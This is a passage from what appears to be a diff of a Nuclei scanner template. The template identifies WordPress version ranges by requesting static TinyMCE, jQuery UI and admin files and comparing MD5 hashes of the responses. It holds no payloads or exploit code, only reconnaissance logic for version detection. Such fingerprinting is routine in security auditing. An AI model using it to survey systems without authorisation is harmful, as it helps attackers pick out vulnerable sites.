3.7.35 + dsl: + - "(\"e44f09fb83377ffdc1157b458e43414f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/spellchecker/editor_plugin.js" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"629a571ee7686ace6ee7ad1181be916b\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"750c7ce89a12d3feb9581048b191b306\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"50a890efd0b000bebf8f59be18b4756e\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"bf331fd1784c21ad46d5476b9a0d2bf6\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"7b87925059f743fde748249a86023382\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"a9338da99929e597afc66c47f896f19d\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"1cb7ad26e99573dae76e9db4bf8eacae\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"0712d6f4126a024e78ae414d0f9eb26e\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"59deb149274a5e866ad189584400ea7a\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"a23620f619ed83c84c36d30ce50d888a\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"7184878c54ac0ad03d1c3991e53fc48e\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"16790290584c848e3c1661a19b5fb8dc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/spellchecker/changelog.txt" + matchers: + - type: dsl + name: 3.3 - 3.8.35 + dsl: + - "(\"b37d71f086003790ea5bb7bb390b6514\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"47521cae14f8ff1d8f0438c4eece96dd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/spellchecker/editor_plugin_src.js" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"8b752a82741c05573b7591571a73238a\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"dfd90ec4732fbd422523c8264d9c6618\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"4a1ccb08ad7a42be05124e2db14dc558\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/spellchecker/img/wline.gif" + matchers: + - type: dsl + name: 2.5 - 3.8.35 + dsl: + - "(\"c136c9f8e00718a98947a21d8adbcc56\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/spellchecker/css/content.css" + matchers: + - type: dsl + name: 2.5 - 3.8.35 + dsl: + - "(\"d236d4333281b4eae7a1e2b514b691f4\" == md5(body))" + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"8d6e330ef6a597e6e4cbd34dd1142d55\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"72331b2dc8d86d4a5d735a6a81b64240\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/editor_plugin.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"e7e3089339dc85691bed70d81734accd\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"ace4ee20adc97976943071a23a644834\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"027f347c2e18dc9d6baa32a2b3b91ba3\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"55ff6649d76ef9f00ab07bd042c04080\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"48b93f5e8a259e79260d20c0f058c3e4\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"96c894139b58313c7db685343689df3e\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"e203448d1abcf685301d3f6a24251ced\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"5b145b1c56b55c90b4aea900fce25880\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"cf113c3a5323ea17b16af7793a8044bf\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"c29b7af54a61d8a5fd8ad8940a952cc0\" == md5(body))" + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"01d4facd6dac7390c24b0fc432123111\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"21ceba9d264d698cfcc0c19ca1b0552a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/editor_plugin_src.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"2a403fc1f292458b7e9a323901e9d171\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"f99e775a94ebccd2e099282fed60f79f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/js/pasteword.js" + matchers: + - type: dsl + name: 2.9 - 3.8.35 + dsl: + - "(\"10f73efbf570633989e2801d0b10de4f\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"179e37760324b39e7d41b61bc707abb3\" == md5(body))" + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"7f69babced989fb799e0f7a617441c71\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/js/pastetext.js" + matchers: + - type: dsl + name: 2.9 - 3.8.35 + dsl: + - "(\"69ba0c60f23785b0c60e56b1919e53fa\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"9db07e9a6d27f06ee292ee9d0793a725\" == md5(body))" + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"05482c276313c900e2a2b55508712b13\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpfullscreen/editor_plugin_src.js" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"c59d928618f4eb94397ba801a3c100cb\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"a5356abede54850eae9c4444bb914750\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"393aaad342ffa662acffe4b7ebd77fe1\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"9518d57cd71cab0e2e1b792c8f2e7afb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpfullscreen/css/wp-fullscreen.css" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"de3ad9d8c97491f41feaaf5d5d4d60b5\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"47e03ab3c3dffa3156931d74ef44d52b\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"1ce500bae8c6556682d15c05171b53ee\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"9e19bedfc3e87227a024cda58a0266f4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/img/delete-2x.png" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"fc29fcdb63500be0c6096b4621840f24\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/img/delete.png" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"6de18e0045263b20400e284eb2731939\" == md5(body))" + - type: dsl + name: 2.6 - 3.4.2 + dsl: + - "(\"748b2a72b7e2aeec7e32f3f1846b5ff9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/img/image.png" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"528e8e81d99bf63d0b7f88bdd0051d3a\" == md5(body))" + - type: dsl + name: 2.6 - 3.4.2 + dsl: + - "(\"a7a2baa789bbfef570b3c4be0a838ebd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/img/image-2x.png" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"e122da77cc3ef946e42cf76288800cba\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/css/editimage.css" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"be84c8843d5da59cde1aaa472acf86a6\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"7b6706be2029b702630f0d14ca83bdc4\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"24f7a66d3de202e80523d0d1ded072b8\" == md5(body))" + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"f3965730983a5b39b3d61af55ea2977e\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"316db36315e941a43831b726bc7cc7ad\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"3223cb47ddd88a68afddd68174432e02\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/fullscreen/editor_plugin_src.js" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"dae63ddab5c4a9fee69fe36e4f2558a3\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"bab6098141b6550727394f2a52fb0aba\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"bd6ef90e8f4138ebb23f18b3c69b67c1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpview/editor_plugin_src.js" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"877c47e5ec852d4446782f56cd7fda90\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"fdfef23447596978a7af1c589a704bd3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/button.gif" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"19f864cb81177840dcd534df4d537ea3\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"9e911a2c3cb4720d44844ef2d1832a51\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/confirm.gif" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"1bc337a20c319e531cda6ced531827d0\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"44f1d55b14fbc66b98f3899d90611c3c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/drag.gif" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"5847788e8ae098dd7fc3bdbe1a084da6\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"c8984e70b184ca51bc427aa106c29453\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/alert.gif" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"568d4cf84413656fb72fe39d1dd60f8d\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"56646a5e811547c8bc3d1b9790496b89\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/horizontal.gif" + matchers: + - type: dsl + name: 2.5 - 3.8.35 + dsl: + - "(\"0365e75dd4a9ad61dc98dcb641207c21\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/vertical.gif" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"0261136fac58ce77bdbd96aa0194947e\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"193884a332e91059643448ed4bde2e04\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/corners.gif" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"55298b5baaecb7e06a251db9f0a4b14c\" == md5(body))" + - type: dsl + name: 2.5 - 3.4.2 + dsl: + - "(\"2e89a17a473f0e488f3e789ce998f064\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/buttons.gif" + matchers: + - type: dsl + name: 2.5 - 3.8.35 + dsl: + - "(\"2e101a4aa637bfd16cef7e763e8c2eed\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/editor_plugin_src.js" + matchers: + - type: dsl + name: 3.4 - 3.8.35 + dsl: + - "(\"50960b97a8030fd80d582166fef4ab57\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/editor_plugin.js" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"e598b8a8f94830e55c044ee7b6dd7bf0\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"b1f0a677a64e08005a093b4049f54d53\" == md5(body))" + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"c6407f04ec80e657ba01bf5938a60faa\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/editor_plugin_src.js" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"76bd5bbf6dd69ef9a02cf6c0ed45453d\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"bfcceea9af0abd6cca120cbdd76af2f2\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"0c8c4f07f089e8ae86166ab16201cda9\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"9dd84d5a159ba243f18568c223a534b6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/editor_plugin_src.js" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"90e1aaca98ff9c022b8b92e5a4f95c60\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"a6438b9df6aa7af17ad9c1ca2019d014\" == md5(body))" + - type: dsl + name: 3.4 - 3.5.2 + dsl: + - "(\"48784cf4970b78b03ce5d6da9cac5621\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/js/popup.js" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"6ceb647592588bcf463befd9408e27ad\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"6ec150b7987caaef98b59c87b9f471be\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"ed402838f592c94f7193ea14f8b6080d\" == md5(body))" + - type: dsl + name: 3.1 - 3.4.2 + dsl: + - "(\"a38ac5266924938a4ff5514369c6b40d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/js/wpdialog.min.js" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"11c54c73d65807fda84de489cc293213\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"6f509c02257266b9ae4b7686b348b6e9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/js/wpdialog.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"a385e127675754d68ba3ee7f2e52000c\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"5839f864d7d49087233bd5d757c1dce0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/js/popup.min.js" + matchers: + - type: dsl + name: 3.7 - 3.8.33 + dsl: + - "(\"63b0aed9b02f879a6e0295fbea7db854\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"a38ac5266924938a4ff5514369c6b40d\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.8.35 + dsl: + - "(\"e66d35d1f2662ffef10de09a788a5ac1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/editor_plugin_src.js" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"4c0617745b1e12ce03667fa18ab4653f\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"1b2c3742258f2159bfe1c3d5bd3c3d25\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"e61dbbc27d24dcdf7dd27875920e202d\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"c0e1697f5027204a9a8409f4048a1150\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/img/edit.png" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"42a45087214d7c886a308fd83406d60d\" == md5(body))" + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"9554f2aa129d2d01e247a73669bb832d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/img/delete-2x.png" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"fc29fcdb63500be0c6096b4621840f24\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/img/t.gif" + matchers: + - type: dsl + name: 2.7 - 3.8.35 + dsl: + - "(\"12bf9e19374920de3146a64775f46a5e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/img/delete.png" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"6de18e0045263b20400e284eb2731939\" == md5(body))" + - type: dsl + name: 2.7 - 3.4.2 + dsl: + - "(\"748b2a72b7e2aeec7e32f3f1846b5ff9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/img/edit-2x.png" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"55706c78fac741908045b68213df637f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/editor_plugin_src.js" + matchers: + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"3f0d7eef1ba22024488ddffcb3bb0e55\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"30d8cd0fe92587476fab267f2598ad7d\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"0a4a9b17e7640d4a0b7ed0b1404c89da\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/css/media.css" + matchers: + - type: dsl + name: 3.2 - 3.8.35 + dsl: + - "(\"4e29dd1bf318a62f0b5d39dc610e5f82\" == md5(body))" + - type: dsl + name: 2.6 - 3.0.6 + dsl: + - "(\"51795abbefc981b9f77083afd672a495\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"05c0940b9d0db9e52175d4b2e3b330c2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/js/embed.js" + matchers: + - type: dsl + name: 2.5 - 3.8.35 + dsl: + - "(\"5df3783492b848adde42124a1e9cf383\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/js/media.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"1c9dba9ba82579d5e865bbd33e325354\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"2dccc8818dffd06a3a234f0bc52135b4\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"1303c105ad0a1ce44c27e106825a3eda\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"ebb309bfaa19a8b3c0e9051cc3e73df9\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"cac808d6007f1003b334e315f01ceec6\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"1e782a443c073b57897597a0720e2a82\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"7f564d3939db8324b11699de512a1562\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"d753adf6dd8922ef62944d3daf3f93c7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/tabfocus/editor_plugin.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"d3e5ef7a1a203516af0d8fdf94952fd2\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"dccf6d391c252e2571f2ed4b15fba889\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"2993514e91cbf86c13ba3ca12b7a19e0\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"15397ee0ab8280702de894ed2c8e9e40\" == md5(body))" + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"1a8e22759ea3340a010af52f4210a26e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/tabfocus/editor_plugin_src.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"12889ccf8caf1d466859ba949f52fbca\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"8cf50fd7b506d6ee501f58d19c68eedf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/directionality/editor_plugin.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"e2d925fe1e778dbcade06d55164fc276\" == md5(body))" + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"653c3a89058b610fd12242faf4f01cdf\" == md5(body))" + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"7713d6e3e2531ea5047b4e2532448d43\" == md5(body))" + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"7877f482e6df41494a9e0ae82c6bd33c\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"d05c4cbac3ecae620c904462a43774ed\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"15016a76dc405fe716a2cce3ea67e0f5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/directionality/editor_plugin_src.js" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"9da7f763c6a1f1b7fc61582e7d454cc3\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"7a8992f2005bd63d97c151edb2d67ce9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/media.gif" + matchers: + - type: dsl + name: 2.6 - 3.8.35 + dsl: + - "(\"b1a62e29a44128ae7a3d932b4941ea33\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/trans.gif" + matchers: + - type: dsl + name: 2.5 - 3.8.35 + dsl: + - "(\"12bf9e19374920de3146a64775f46a5e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/page.gif" + matchers: + - type: dsl + name: 2.5 - 3.8.35 + dsl: + - "(\"ec8d1ed1b0fd137cacdda9e316ebed31\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/video.gif" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"233f9a78eadddb26f8976682e6d1bf44\" == md5(body))" + - type: dsl + name: 2.6 - 3.4.2 + dsl: + - "(\"10a455edf8439d00599854ffd2add437\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/audio.gif" + matchers: + - type: dsl + name: 2.6 - 3.8.35 + dsl: + - "(\"edc58dce8aab5d12e83fd4aac849cc05\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/image.gif" + matchers: + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"fe5bd0edc99f44dfe3ec2302359a7f81\" == md5(body))" + - type: dsl + name: 2.6 - 3.4.2 + dsl: + - "(\"c25dc2e7e5c0c2203ca0ca516ca852a9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/lock.png" + matchers: + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"1acca50f0abf4ccd7a0f34669815158a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/lock-2x.png" + matchers: + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"6e0a92872a2545f5bf44bf7e3daa73c1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors.css" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"70f1542f61be52ac4751c00563434e07\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors-rtl.css" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"a67ae8fd5b6ca211970eed4a7e466bbb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors-rtl.min.css" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"b94de9cd5aa0fbbbf9b48d7338969e3b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors.min.css" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"ac70977f942003cec4863894ecb13b10\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/theme-preview.js" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"7780c09b0a726bc2cad5416aa4f6d253\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"36dabc552ff9315e1e782ad144ea383d\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"7897b96ae14a96dbe9cd2e5f8236eb10\" == md5(body))" + - type: dsl + name: 3.0 - 3.3.3 + dsl: + - "(\"8c36f08abc18e61fdc1be3e450198829\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"2a45bb51fcab2c53f7e723ca2daf1847\" == md5(body))" + - type: dsl + name: 2.6 - 2.7.1 + dsl: + - "(\"74c371f0a247009485920605bcc286b3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/theme-preview.min.js" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"e95ad5d62ad2871162b4636b2884d907\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"7897b96ae14a96dbe9cd2e5f8236eb10\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/theme-install.js" + matchers: + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"f0dbe61086f880896f44ddb173933101\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-clip.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"38df21cba8ed00415b2229c3053f0a31\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"71a13d33f3fc7de23f13adcc4593a5a2\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"c566a56516cfa9b0f5f0af9515edd008\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.droppable.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"c86a22c5e36db0f80387ce5de67787e9\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"79ea08a1eb866ba2039cc617ada702de\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"0d6eef31f7bd7215fc554b1455435efc\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"07b2b6e067cae96848f1e017015e707e\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"82d400563161bb3afc1f882102b294c0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-drop.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - 